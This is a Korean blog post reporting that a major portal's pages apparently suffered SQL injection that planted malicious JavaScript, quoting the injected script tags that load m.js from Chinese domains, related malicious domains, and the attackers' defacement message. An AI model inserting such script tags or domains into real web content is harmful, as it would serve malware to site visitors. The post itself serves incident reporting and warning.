떡이떡이
국내 모 포털 일부 섹션이 SQL인젝션 공격으로 악성 자바스크립트가 무차별 삽입되는 공격을 당했다는 주장이 담긴 제보가 전문가로부터 또 다시 날아왔습니다.
현재 구글에서는 해당 포털의 악성코드가 확인이 안됩니다만, 이 분의 주장에 따르면 포털 웹페이지에서 확인이 가능하다고 합니다.
대형 포털 섹션 XXX에 들어가면 http://www.wowgm1.cn/m.js (클릭 금지) 이라는 페이지를 호출합니다. 이 페이지는 해당주소/0700*.htm 등 여러 htm 문서를 또 호출합니다.
호출되는 페이지의 내용은
This is a mass invasion. Safeguard the motherland's dignity! FUCK FRANCE! FUCK CNN! I WILL ATTACK you ALWAYS ! I love my motherland! sorry Please understand that I IF YOU WANT TO SAY SOMETHING . PLEASE SEND EMAIL TO kiss117276@163.com
입니다. 다른 페이지 감염 여부는 확인하지 못했습니다. <주요 실명 표현 삭제>
이는 제가 단독 분석한 앞선 기사의 연장선상에서 공격으로 파악됩니다.
UN-英정부도 한때 뚫렸다…개발코드 허점 때문
http://www.itviewpoint.com/56425
경찰서·지자체까지…그들은 해킹에 무기력했다
http://www.itviewpoint.com/56766
이 글에서 저는 <script src=nihaorr1.com/1.js></script> 형태의 DB 강제삽입 공격에 대해 소개한 바 있습니다. 당시 알려진 도메인은 nihaorr1.com , haoliuliang.net , 2117.net , 2117966.net 이었고, 악성코드 자바스크립트명은 0.js 1.js fuckjp.js 등이었습니다. 이에 미뤄 볼 때 동일한 공격 형태로 m.js를 뿌리는 것으로 보입니다.
제가 추가 취재해 본 결과
<script src=http://www.wowgm1.cn/m.js></script>
<script src=http://www.wowyeye.cn/m.js></script>
<script src=http://www.kisswow.com.cn/m.js></script>
등이 악성 코드로 뿌려진 상태입니다. 방송사부터 지방 단체까지 상당수가 이미 감염 됐다는 흔적이 보입니다.
관계 당국의 긴급 조치가 필요한 시점입니다.
안녕하세요. 블로거 '떡이떡이' 입니다.
여기, 자주 오실 필요 없어요~
하루에 1분만 보면 돈되는 정보 하나를 얻어갈 수 있는, '정보블로그'를 추구합니다.
많이 얻어가세요! 헐헐헐헐~
Recent Comments